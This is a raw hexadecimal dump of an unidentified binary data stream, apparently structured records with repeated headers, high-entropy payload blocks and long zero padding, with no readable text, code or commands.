2D2489F6DC1170E106AD3DEB86BFBB9ED78331680281000000000C7B000000E32D0000010143007B008110200002800000800000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000400282000000000C7B000000262E0000010142007B008A10200002800000800000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000400283000000000C33000000682E000001014100330000814002000003000082420C9811DA4DD2D752EFDC18175FDC1877A38F67AE2D2489F6DC1170E106AD3DEB86BFBB9ED78331680284000000000C7B000000A92E0000010143007B008910200002800000800000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000400285000000000C7B000000EC2E0000010141007B008210200002800000800000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000400286000000000C330000002D2F000001014100330010814002000003000082420C9811DA4DD3D752EFDC18175FDC1877A38F67AE2D2489F6DC1170E106AD3DEB86BFBB9ED78331680287000000000C7B0000006E2F0000010142007B008110200002800000800000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000400288000000000C7B000000B02F0000010142007B008A1020000280000080000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000040011700000000089D0B0000A52B00009D0B6800006D2800936B781FB0A44C01FC8FF96629D17DBF57A620D1019F011ED8732CE23DB84E52DAEC342A357D0C7E09537DB3970CC7B1D0480535D8CD6AAAF29AEC66B5557B39CA50070EAAA3743853281B2B48D3E31CF93578043BED4C9975D341E6CFB3C51139E771E305F96C91BBB1A1055EA137F418237129C3EB58805AD1FF116A154EFD52118CF4F99A10CAD9CE57FDB12803891904D628022DA991AF5B66A4EA5E5510B29ED0AC42D99FCBC8D34C3EB7248DDCD5CB3F008B4208210CB59FDE7134525AEB5D616FC2D385DDD833CD94EEF18FD9199CDEC7A2755E1A760024D59E07EC29120433D655A23D2186D06B128E3894F21B0D585C47B21E828CDCBA28F0E61AD078F881DA81A61C8E824029AEC66B555794D76335AAABD9CE576269401C47681640A57B535DC5455C36AF95183742C85A19E48C1F65E36F834D96B3650F3DB03FA725B7A79FD67D2B6AAEA7F193C93839E17E6F57F62228E66BD1951646AD9CE576649401C32EA003C083734F0CB12F3493677A55A4D8D9FDE9262CD18423C7DBD6E2EE732347DF8A72716220C7EB50B939FB3D34DF36E15AB37FF7913769D65846101B18FB448CD6CE4AF0E2900126F2F03F6149A90700491590F75841EC1CF2AA83C25C2C00BC87FB976618696251ED4672AFBC96B0BB492258D7034343ED8E824029AEC66B555794D76335AAABD9CE6E246B12803864E2AA64EC6EADA3753AC928D1A1B80292252C93D8CD62FA8502825B7BD39FAD93BAF14D136AD821BFE35532C196D89BB29994D6BAD7B51D820BEC18CCF9AA1E6999BCF6022F439026056CE729401C3EEBBE26A26AF5528D0B51797936680A38A75E38ADD18616B149D4D6200C532164E01636519C50404C3655B3E07A0361F3CDBD47FAEA5B67991EC5DF44FBB170A94E5FD77CC658AF0E5B00126F8F01F61499C8D08D286B8F1E161F1E1FD3F51DA15FB409C1307966CB578BC2867C1DCFE4B911ACA67CD1C00F0326804B1D0480535D8CD6AAAF29AEC66B5557B39CA80D2803857D4068D5754F571AA8A6DF89DBBD5AEEEF0D5AC38A74139E6C7A02DD8DBDAA523377831EFA2BFE9C141A565E826D1CF9CA9D07923F84D7BBB0B337F619CA110A2742340F0D126D9BAD756CE729401C4C7596147F8226A5EAB26514D6D4F550400C5BF9DF2FC388F3C43069D8252117041787A15B45FF0D08115E51E50F0661BEF7EC98C9D0979CE4A73B5496C3A1D91C14407CC2CE5BE18B17657860E8009343781FB0A44C0278F5484B21EE42F2E0F36E7C0B15F0F8B364C862769DC74FB7C5C8738D083E90D09551D0440535D8CD6AAAF29AEC66B5557B39CA500716F292717613D0837251A1AABB05F8A820F558F7AC66BB9229A9B62D8564FEEFF476CF51655E78C8E68BD576796FA020B36BE43F943A9B0F9BCEFEA1A2D5824AD9CE528038ADD7EAA2855DC811C692F6FF4563B35965F753B0FAF32D30C934329A762C42A27302C45B369A634BECCCA6B241A38B536ECBBDF910DA9C85D9DB55E199E0024E51E07EC293350EFC351C7B722F57E877583C12A6DC6761D69F432811F53102DBC76C8F9E4DA08725C2D65FAF607C5B0AC25C06E3A0880A6BB19AD555E535D8CD6AAAF67394A00E21FACB0BE20B51A72FC125E45DD543EBDA280208B26EB199165E9B29B5957989B5705B7F53277D6C098D7B2835E9B596404013D4C82E8BB416A3693CA4AD9CE6E209401C405726AC2B04BEE87F578BEDB658E8E7752A0BCB6D9DB2135AA453FB514ACB14E70EB42A5435DFD64DF64D651826CD0DB2727249D2823712D3AFEDB42BC327C0049B4BC0FD8526164E56B827F05B5E2C47424CDA57C203A92CB03946E7D0CBC4E7856538465C86F92300B749264B42C23A0880A6BB19AD555E535D8CD6AAAF67394A00E25C4F4CD144CD6A92942AA200A72AA9AF63B5BE4FD4ED9CE08B42D970E59B92681EE8C1E2CB54A28F96935668B213CC8016BC1660C0843F943F332AD9CE528038AB639A993E550DC285539C93FCC828DBAA2538B611592362FA9BE6BE20F42BCBF8538A4B58217480D9176583E2CB7CE4E8F2CB02996F28FF7D19CB049B563430CA5257861B8009363781FB0A46C05E36EF7EA6E3D25D7B5B8252F4E035E3A96809B1D0A176CA72AF6B45E5D35A4C58F8DAD592DC731D0440535D8CD6AAAF29AEC66B5557B39CAE104A00E255417723AC9BFF5A96602F5158BE2C44EB5E02EB009295F66D692F9F36AC9AF06C6E16983275904138AC327721C10EEA5445E9DFB5913A68FACC2AD9CE5280389250EC81429A085DD56B13194ED6AB82D58B505A829F5B46FA76AD46A54563C1297EAD1CA365109B04C1A8B0CDA6ED3423C91B3498597DA7578ECAEEF29FE8CE635FEC8DAF33BAC9E2DDC7BABB8B69CD1FCBFF4B795B39CA5007171AEF8A854EAA553DC50C32A8C9A8491297EE1AA5E33A640CA509759819AAB51FE6A4A7E17AB6C9B048C29AA48E6D461C45FF40F8A561BD31B2368DF2B800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000289000000000C33000000F22F000001014100330000814002000003000082420C9811DA4DD2D752EFDC18175FDC1877A38F67AE2D2489F6DC1170E106AD3DEB86BFBB9ED7833168028A000000000C7B00000033300000010142007B00891020000280000080000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000040028B000000000C7B00000075300000010142007B00821020000280000080000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000040028C000000000C33000000B730000001014200330010814002000003000082420C9811DA4DD3D752EFDC18175FDC1877A38F67AE2D2489F6DC1170E106AD3DEB86BFBB9ED7833168028D000000000C7B000000F9300000010142007B00811020000280000080000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000040028E000000000C7B0000003B310000010142007B008A1020000280000080000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000040028F000000000C330000007D31000001014200330000814002000003000082420C9811DA4DD2D752EFDC18175FDC1877A38F67AE2D2489F6DC1170E106AD3DEB86BFBB9ED78331680290000000000C7B000000BF310000010142007B008910200002800000800000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000400291000000000C7B00000001320000010141007B008210200002800000800000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000400292000000000C330000004232000001014100330010814002000003000082420C9811DA4DD3D752EFDC18175FDC1877A38F67AE2D2489F6DC1170E106AD3DEB86BFBB9ED78331680293000000000C7B00000083320000010142007B008110200002800000800000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000400294000000000C7B000000C5320000010142007B008A1020000280000080000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000820000115D0A05ED260000CE059B011800000000089D0B0000182D00009D0B7800006F8800936D781FB0A4D483906644A2E161677BE1812A343942364C8EE1841534FE8E57D4AD7B388D49B7700C1A300F0F4A3A7C7412014D76335AAABCA6BB19AD555ECE729401C3A89FC4AAAAB408DE8C73791FA26A4F252C9A9BA98470275302F672A142735B7A465AD376B650557E5A0C13D7B1612208AB1E777B8D2B5D98617F3A330946B1A2E5845B8A3A1BFCFB8F6D5BDDB2B673940B27FF9250070A851524F0F757696216DAA5FB82C741B4BC8F711478CBD3842D9C37A013824CD2C5E6C9AAF1E5B9F78A2162283C0AC4D5B0A32CA644E147E472A305AC26A6A2757867A800938C781FB0A4C812ECCF7E06F6FCD95173E5D08FBB961DA4E4D923C2D6695A72676475BB6E7BED49C9DBF536DA387330F19321F8E822029AEC66B555794D76335AAABD9CE502E9401C472A03AA51AEB52AC174261908459E4E55D1B51D505EA3B59A5AB274191D5D54AC2B52F2959079A61F4B99A28A38B511B419416C0BC064FEF90055146EE15B39CA50071002500709AA9A7EA039214DE9BDDF86A8E094FD1689B21F554FF477E8F2D42DD5E4ED55EBDB45158A3733DAD34EC5BBE305162B5D089B46163EBBFD8D64DD5E1BFA0024D49E07EC2933603266D0E110E237C8C69AA721800DB8658F85C8EE0B7D3B0ECCF867E88DF87AC93116B6DE98E824029AEC66B555794D76335AAABD9CE5280386D5280385163754BCBEBC7AAC5B1DAEC329FAF646A14714752FBA6787913DF79551909174524668CB66FB252780BD19C2B6193BD0D9658B5A0909B13A364C6D2A4D0F896FB33DB7A40B6CE00CEECAD9CE50F2B250070F05C8E8CAEEAAE05556A2353DD7A14E41156CD656EA2CB5693E5106D94934FD6BC535E665A5D67A1C795E93EBB7A4EFB992FCD4D8137B71FC2CB194A4CEA6163101E67D40057871F8009391781FB0A4CC119F4F1B352A19A3972C1EF3E3DA43E02D64BCAB5BCAA0BF1D8B5DEDA737F61004A73DCB5C9C139965044FB3EDC7412014D76335AAABCA6BB19AD555ECE729401C557775A5FBBC99F405354684B6C8178D7EA7B100622B152833773FFA0604D96ADFDAEC8A196620177275A6D16E2C45EB61B4966923646B41256B90B26C09FE038BE420EB495B39CDCA29401C3669E74FD83B596D1FA6AEA6FA6DD4225241A95E687E883F931AFC2A50DF028A63D159E64ED8A6565D3BA1718CB26B26E88614DD185181956A3B65922F92F427F7D8E6326845434079F2D62AF0E43001271CF01F61499801B69E4B27B686DB52DA0F6F95E977C84A160A5EC127E7253D5B2AE1B6E0672E54F2CFC7C79A7EEA6C22037A5C7412014D76335AAABCA6BB19AD555ECE73597EA500709F20ECA154542C4054F2A7427A1BFF794975BB7AC87F375554F14BEF3A82CB66EB13A9BBEFA28B7F029D78904E982C1EBAC37ECB7D29DB26BF0FAF1FF8CA46D67F507F2B673940B2500711DA088D203155B5F611748FE0A71AF40D63D5B341AD6C38EF76B51ADA3EA8A8E7F79B9CA0CCCF244CA67DE2E80ADB2FC0D62C4722C982F3B9F7F77FA566403C891C9EC17A52866F202744957870F800933F781FB0A44800C31DF6D0B9DE363ABE1B0377C242E23AE4E0CBF0FF49BB94057EC0B701B486AD03011D0480535D8CD6AAAF29AEC66B5557B39CAE074A00E1AF5D480A113C4A4BA95442AA2D36FB072EB2F4C4343C7FE605D9C3DE085B429DE7B5CC80019E80787EED8DFC75E83E0FAC4C8B112FBEE78DBF7B1ACB77FB61261450DA5643F824272C3A5995B39CA50070F028065D7854934A72E4696235B41EC932D8BDA17B6D6B11C5B65D5ABC045B64E06B648D1AD6D26859018130213CA489CFF1163CB1842F0EAC9EE32D7BF6CD37F679B7EB4F8C8EBCB58E36018AF0CED00126F8F03F61499B21C39FBEC350BDDB4BEF1CA855F2448D7FB80934D2A7DB61BD77ADAC3EE25395670263723564258861C3B1D0440535D8CD6AAAF29AEC66B5557B39CA059280389123AA849DF4168128D2DC512028FD02723422A116ACA9DFD78430BEE14D3E166CD32C7AA357266607EEBDC4E7AF4A6FF525AF2BF63AC456BB2B6739A9752803876D7883697D1A0BAD5D429C446E1F2F1F7DFFA6F8AF7F7E8CE5295F65A9B5545E179B0473A38B6F94CB3EEF3597DD91EC0F0A267828C88C6FA07B5D13859617F34E8E2BC33140049C83C0FD8527636872439290DD6C587D4987B6F128B647531F9DA664D1D4DF0E39495E5FE979B2E29FCB5E83A76DD0B6E4E090B47411014D76335AAABCA6BB19AD555ECE729401C4B6590EEEBE296C751A3C5D3EA354A2CFD5A64A2D49D4DE1FDA3194498893208B1A702CBE8221AAD933BED54FEF0FBF283DF6FFD342D77777CCF7DE411E2B67395F13C49401C26D1D6574944B846E96A9623ABA81557CD342EBCEDAB7A11A14284F10B91498A4B16235A2D6B6FA6267E87A28FD14362F6537B745F7DB2064466AE00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000011900000000089D0B00008C2E00009D0B880000697800933E781FB0A44D529EDAAC1856C79C75DC55F86187FB1E7CA54FCA6F6F69D7E8BE3C3CC3FD3F078558F63A0900A6BB19AD555E535D8CD6AAAF6739401280385C2FAFFABA21502525F17B56D6AF50950517EFB1FC8542525E63D457A4B788C218E348321328001ECDF3FDA0BCE4DAD1AFB238B5BB8B6F615BA509246EDF7B22F76153935B9381F1FC2FAB67394389280389B5E1515AA029D5BD62D413E4C1535F37FE029AF219CB76DD37B25E5AF26D53929FD67FCEA7062DD67795D32C47B2BD21AA77CA9697DADC0F9BF4E35E530AF0C9300126F6F03F6149D845326DEBB6D964982F85039FBA65F6F47B1DB6F1FE3867EB5638C8D6CB996E45B0FD4835700B88CAD902E3A0880A6BB19AD555E535D8CD6AAAF67394A00E2B8501D4634BAD65DC2BD2B13EC40FE5164115F29F66D8288A35BFA99F6BE0732692D4060CBF3BCD659020157B782D3F60CA729E11FA0D008BAB60AD9CE50FD7F92500709E21CF410ABE5E5F67752146E85D4AC63F524FA118A48D12CB2AA7A80FE841F9A750DBF8FB3F24FFEB1F68DE446C93FF179450BAB664B23D9DB44B85786378009351781FB0A46C2128B01DE327D2D7E52167BD08D8ECD33AF9237638A26B130B54FD90F48794D99721E422E6C7411014D76335AAABCA6BB19AD555ECE729401C4B69ECBB2A095935910DF5D4CA2F622AA682B50BC05E8B7AE197F53921AA68F36835FFC1BAE51C85EB278F2F8525B24D9910438A4CB59E7EA16E4995B39CA7B20A74A00E21E4B14D0A8BCAA27C8EB04ED5AD53ADC5A9A95BB2DF30251A925BEFCACDA2A287C8DDB135AD4CAA4051B2CB65B0CD48C17A7B0EA7F4272BBB6C686C76F58AF0E2B00126ECF03F6149D844D3EC3E86E3F80C053966478D246963ABCD48B1A7AC7C44855B60EF47D84B81FF1D119E465A3D7A8D3C7412014D76335AAABCA6BB19AD555ECE731E31D9280386317651A5B12F6ED40806504D09D795095EADD19A6093DABEC5A2BF547D46094DAC597D63E2A9B39DA8B464DDA2C144B56AD950D9D938A82AB6730B484C7811D056CE731E2BB9280385150ECC80437682E2761A9DE38F45D529A9DE46238BE2C4D7864A4B26EE479A4DBE85461E79381AD7599B05E3444AC3B7A166DB2675119784F726FFF582443D89DF7AA9C6AC72B37599D9A062605786668009394781FB0A4CC13A8395A62C9E7079D9C35FAF5E9D9477DA0FB01563617B52F5DFBB0E60DC35143C2A3FDBA7ADA7CDF46F994E5B8E822029AEC66B555794D76335AAABD9CE5280388E17FBA3FA2AC13D162E9BDFAA8D6CD4F17C751DBE83616BF34E3E26234E2923ADFE489494DFEC996C0F957A4A273F9DA99E7677F4E1BCC25AF39400795B39CA0592F04A00E2719AF17AD1E082149D4E3894722F7C923D79909A993F5518AABCB5F3549B20CDFA12D983055A9A58677C998C2615ACA3681D4745DA0476DE7BE55E1AA60024D41E05EC29330CF92B76164CEC4E59A89B40A507A036E1A76329ACB2965F2992BD4BE36E008B4CD1C07D8D63A0900A6BB19AD555E535D8CD6AAAF67394A00E2092BEC7E8C70845ED05452FB977509AD7BA5F5D126BBDDC5B0516A29125A6DE873D9F46B5C66BA8BDEA2BD528367FF1D9FCCA1BFE95964A4CF93769ACB494D58B742DFFCB977DDC56CE729401C5391348F2371D44FEA082E12A377B51C123B464D862BEC996277DB606BE26CD8CF461CD7280299C44CFA21214529ECD91294F03B5DA296FEB79907CF9F591A8CE9645ACAF0E2900126EAF03F6149A902D07812C91F61F9CDB1DCA44AD104A6A05B7043A266070E4A1E39E15119724AD29F183B40DB30970598E824029AEC66B555794D76335AAABD9CE5703A500709E5F4F2D3C1AEB8ECB167FD756AA96EA8BEEA2C9417A856FE8B6D0344C4304FCFEA3F9AD06627F8B521B680E00B75E2933E7FB386619CA951F5E7B5F01C71353FD1074818AD9CE50E74A00E1708FD4D126C5AEAADD0B6A35BC5594739DAB2D42B4EEA2C37E05947D8B212EC0845553CAB6738087FDDB33351A2BD469A26348CA8596D51445C4C081A4546A4EC3DE25FD844DE4FB01C3640AF0CFF00126F0F03F61499821FC5EDCABC7729A732EB9FC9CE35035AD6423C7FD528E5F67B2993760E94BCC48F3B7ACC1BB9643CC2D1D0440535D8CD6AAAF29AEC66B5557B39CA500717EAF6A65E5466A6BE94FE73B62A0FCE15EBB2F0203EB21F4E8DDFBCB055CED94E2A526B564160084D642B4AD58B6165B17AB5DC0D6B19EA2D3B3402CF8A550756CE729401C5BB74979AF2FAF1CA5E539146B2AB6AAD4DBBBBB17C2A2B26C882CC9416C96B66FA8429B6DFC90D256517C9BEC140C84DD4E1448F35358DF956E06A2B3E1FDFDCB15CA7394AC653DF87031A0D57748082C4707AD526894FEBB7F3361FFDB55C0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000011A00000000089D0B0000FF2F00009D0B9800006598009395781FB0A4CD90A3FA9574B6A7AFD4B07A698254466DC36923803161C8DC536BBCDB158FE74DE0CBABEF6A059567D81A823BB0A47411014D76335AAABCA6BB19AD555ECE729401C36D1D055F56A51D5504410D77769AD8850235632DA1E860FFDD7CB21F46BD2C94ADB2411C5AD462A08E180ADC6BBAB45396A333766F55BC316ED0BFDFCD45D6AB67394A00E1F354723AAA2082AA528452B614C5342B3C33FC96A24547CB12F2EA9A659E9DD289C42E982D42C36FE58A2B6822300B089FEB636AAFDB037D6ABC31AC0049B1BC0FD85226A0E04B7E5E4B4A2CA50BDB5F72C3728D53D371F0D82F2A3C765C309619887A81BD1324FBD73D4088E822029AEC66B555794D76335AAABD9CE5280387090544C0305FEF148804E470D2B2AEA129A1760958A70ACBB5F26F968C9518033E2D53BD1B5967F538D628A81D36D9B1B77D79BCF617427DD962B67394A00E1C2ACAEE44893A1AB5575344FD555A112D32BFA8D3DDD4C7E1DB32D8B9D813108E8026AD2B656CA48EDF43F7BAC6F79FF946F268B76588DFD40AD45B37669B1B15E18F60024DA1E07EC291B08A76F1D8B506D8685561FB302D1362F0CC972176AF4B21CECF3F05E81C247824764759A48CE5812E3A0880A6BB19AD555E535D8CD6AAAF67395D29401C54E9E64C8515971030B8B4A71493F775D2B637AB5CBBC12B2EEF867F2946DB54A5ED0A5F1EC38BCCD7B205A985E7E9E7E620C86CBD7A651B8C52BAD9AB67394A00E1EB5C22A0B53A0E82A65BEB86FB5ACA71C42803597FD57962760B1390FF54FF473D0B438B03E37B47C5FCB1D1C29B023BDAEC893802359265A616D0B400AF0C590012690F03F61489821E33CDE79F42585F44EFEDA64A068A1930AB0CC855A8E8FD2CA46D2D6BA6C12D9A3E47F1D0440535D8CD6AAAF29AEC66B5557B39CA50070DB44CE8DC551A07AC6A11698A28DA5F58ECA34DA9906B204CCB36822698401EB6D9831D4AAFCD2B21F80B7648E628D90E22684C96D6F18069F8E07538463E136AB67395594A00E29AA9A2CA7E86B15552590A150D3BBD6B36A9FF550C529A168A9A6A71DEABE8594E5E96384CBD46392E64B56C38F32B737EB728542526243503976AF0E45001269CF03F61489025F63F67394350C391D7733041A9492C55894445E15752C39DBB3980C5B1A9F00307366E847412014D76335AAABCA6BB19AD555ECE72BED4C97D2803852A3F6E962A89D5BF4C8A8A43577E75D6CBD81D7AA64CE0AD54D978093B883270A73DB2D9E6881F13B8F90053D4056DEC66841989DF942D90CCBFA4ED34435D64EAE76336B322A3B39B35AAD9CE57E928038985091AAC7DE44A06BAEC4C811DD43E8618A581640C8C21327411CDDDD94F5EEBF294C036BB2699558C25A593598184D7C6B50944E452692EF3B59E5F69ECA8359BF7044CD1F112D28C62BC389C0049B53C0FD85226C9F82CAD3CC92CDBC87A428F5E45B0C71ECB79D2621AFACF61BFED9BF84EBFB4FC3811B2A18BDAD011D0480535D8CD6AAAF29AEC66B5557B39CAAC250070D3AE1889D9D4105569AEA1DBF4597AC9D5BE10E6D59DC78D51F3A92D76D9DE9553E23708BF29DBF1FAAFCA169C28DE2F4BA3F2382CF584AD36F91C2AABE0583367FA3B27F3FB15B39CAFA9401C591579518B9409F8ABC0136B468493EFBBDD4BD264779FEB564D15924C5390130539B43F0330397545AD76AA8AB4DF93894FD365AD9ACF65AA5236663EB5E7C8560B47DCE406CBD9AF8D2997578695800936D781FB0A4CC11852C912C91E98E323765B7610580DA42CDA78649D7F913F2D836B26EC87BAD13C11A0FB55ACA66AC7412014D76335AAABCA6BB19AD555ECE729401C3DCBB3129773AFAA4893F40CA2AC6FCDFDEAC6AC326DAE512717B7E6D7D6ECDA06867E1059A209B5F2D1416436B9DD477DE590EC8A6B26F9A8E79D8EB19EC3552D86F36DBEB6C2CC8D5B39CAACA50071312AAD569E5054143A3E80D6AE0BD019DE9E8512C86D775E6D558A75554BD671BF18D7E6F3844302338EC34F8EBBC04ED60BEFEFC96B17F9A0B462BC31B40049ACBC0FD8522601312B5B3DA641037F0E508B0E88A601316B726348DE306D3366472CBB14E3F8369AF6CE9C07C3A0880A6BB19AD555E535D8CD6AAAF67394A00E27A41D10E2AC6E1A1552BF2A85AA3822D18538A8D78A92DCC8A66B51D5CB53B6944199918BCCB16B541EF3D96B340C8839B7114392FCAC5252B2C56CE729401C6B2BE27132B14575EDBA64137578EC10CEDFA8AFD8EFE06175365E0F6C9CF8F967F0FC298C9AD1E642D898EC8CB62F585EB0BDE91F0D87C1A2938ED68327F3BE858AEAAF33DA566EC0253D61B3BCDE04996AC86EEC137DD0366B0F914E2CAB988500FE32DB16C91552358FED94C633146990BC25DD16FA404DDF7D17EC08474DC84DF0CAE0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000